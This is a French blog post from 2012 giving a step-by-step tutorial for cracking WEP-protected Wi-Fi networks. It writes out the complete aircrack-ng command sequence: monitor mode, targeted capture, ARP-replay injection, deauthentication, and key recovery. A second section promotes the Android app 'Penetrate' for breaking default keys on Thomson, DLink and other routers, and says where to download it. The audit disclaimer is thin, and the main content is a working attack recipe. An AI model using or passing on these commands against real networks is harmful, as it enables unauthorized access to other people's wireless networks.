dimanche 9 septembre 2012

Cracker un réseau Wifi sécurisé (WEP) II





 crack hack wifi Cracker un réseau WiFi sécurisé (WEP)

Aujourd'hui je vais vous montrer comment cracker un réseau sans fil protégé avec une clef WEP peu importe sa taille, et pourquoi faire ? disant dans le cadre d’un audit de sécurité par exemple et non pas pour nuire à vos voisins, vous êtes avertis ! pour faire, nous utiliserons la suite air crack-ng disponible dans la distribution Linux BackTrack afin de gagner du temps.

Prérequis:

- Une carte Wifi compatible avec le mode monitoring et injection de paquets (lien)
- La suite air crack-ng (lien) disponible dans la distribution BackTrack (lien)

 

 

On commence:

1 – Démarrage de l’interface Wifi (wlan0) en mode monitor, afin d’intercepter le trafic réseau sans fil, même s’il n’est pas adressé à notre machine.

air mon-ng start wlan0

backtrack hack wifi wep 01 Cracker un réseau WiFi sécurisé (WEP)

2 – Démarrage d’un scan des réseaux sans fil disponibles, dans mon cas en utilisant l’interface mon0

airodump-ng mon0

backtrack hack wifi wep 02 Cracker un réseau WiFi sécurisé (WEP)

3 – Maintenant que j’ai les informations (et paramètres) du réseau sans fil ciblé :
ESSID : dark-box
                    BSSID : 00:1C:C5:0A:5C:05
Channel (CH) : 11
Je vais arrêter la précédente commande, et lancer une nouvelle plus précise avec les nouveaux paramètres, tout en enregistrant le trafic capturé dans un fichier output

1 #commande:
2 airodump-ng --channel 11 --write output --bssid 00:1C:C5:0A:5C:05 mon0
3
4 # explication:
5 airodump-ng --channel {numéro du channel} --write {nom du fichier de capture} --bssid {adresse MAC wifi du routeur} {interface wifi en mode monitoring}

backtrack hack wifi wep 03 Cracker un réseau WiFi sécurisé (WEP)

4 – Dans une nouvelle console, je vais procéder à l’injection de paquets ARP (aireplay) pour stimuler le réseau et accélérer la capture des IVs nécessaires pour la réussite de l’attaque.

1 # commande:
aireplay-ng --arpreplay -e dark-box -b 00:1C:C5:0A:5C:05 -h 00:1C:BF:AB:35:B5 mon0
3
4 # explication:
5 aireplay-ng --arpreplay -e {ESSID du routeur} -b {adresse MAC wifi du routeur} -h {adresse MAC wifi d'une station connectée au routeur} {interface wifi en mode monitor}
backtrack hack wifi wep 041 Cracker un réseau WiFi sécurisé (WEP)


 5 – Dans une autre nouvelle console, je lance air crack pour casser la clef WEP en définissant le fichier de capture output*.cap

1 air crack-ng output*.cap

backtrack hack wifi wep 06 Cracker un réseau WiFi sécurisé (WEP)


laissé tourner, et en moins de 10 minutes vous obtiendrez la clef WEP, ici dans mon cas elle a une longueur de 128 bits, et je peux l’utiliser par la suite pour me connecter au réseau Wifi attaqué.
backtrack hack wifi wep 07 Cracker un réseau WiFi sécurisé (WEP)
 
Récapitulatif des commandes :
1-root@imbh:~# airmon-ng start wlan0
2-root@imbh:~# airodump-ng mon0
3-root@imbh:~# airodump-ng --channel 11 --write output --bssid 00:1C:C5:0A:5C:05 mon0
4-root@imbh:~# aireplay-ng --arpreplay -e dark-box -b 00:1C:C5:0A:5C:05 -h 00:1C:BF:AB:35:B5 mon0
5-root@imbh:~# aireplay-ng --deauth 10 -a 00:1C:C5:0A:5C:05 -c 00:1C:BF:AB:35:B5 mon0
6-root@imbh:~# aircrack-ng output*.cap 

Mon article arrive à sa fin, il a a été rédigé en testant la sécurité de mon propre réseau sans fil, alors inutile de me pointer du doigt en me disant : t’es un vilain

En espérant qu’il vous a plu, je vous dis portez-vous bien et n’hésitez pas à me faire part de vos questions, ou autre..

 

Cracker les réseaux Wifi avc Android

 

Le Ministère de la Culture nous avait expliqué il y a peu qu’il suffisait d’affirmer qu’un réseau sans-fil est protégé pour être lavé de tous soupçons de téléchargement illégal, malgré le fait qu’un outil permettant de contourner les protections en théorie inviolable de la protection WPA 2 soit paru sur la toile…

Voici une autre preuve qu’il est très facile de pirater des réseaux sans-fil, cette fois sans avoir besoin d’ordinateur, mais carrément depuis votre téléphone portable !

Penetrate est une application pour Android qui permet de vous connecter à certains routeurs Wifi (et donc d’accéder à leurs réseaux) sans avoir besoin de la clé de sécurité.

Comment cela marche-t-il ? Penetrate utilise des failles dans la génération des clés de sécurité au sein de certains routeurs et box Internet. Il scanne les réseaux Wifi aux alentours et vous signale ceux qui sont potentiellement piratables.


 








Une fois l’application installée, il vous suffit de télécharger le dictionnaire qui contient les mots de passe répertoriés pour les routeurs Thomson et vous avez un téléphone capable de tester la sécurité des marques de routeurs suivantes :

    SpeedTouch, Thomson, Orange, DMax, BBox, Infinitum, Otenet, Cyta
    DLink
    Pirelli Discus

C’est un logiciel qui commence à dater, mais puisque cela fait longtemps qu’il n’est plus disponible sur l’Android Market et que nous sommes actuellement en plein dans une actualité où une organisation gouvernementale prétend que son réseau ne peut pas être utilisé pour des usages non-prévus, j’ai pensé que cela pourrait peut-être vous intéresser.


Penetrate est disponible sur le site de Cachem, que je salue au passage pour avoir déterré il y a peu cette petite merveille des archives du net.


Au passage, si vous souhaitez encore vous amuser avec votre téléphone Android pour utiliser des usages non-prévus du Wifi, je vous recommande de jeter un coup d’oeil à cet article.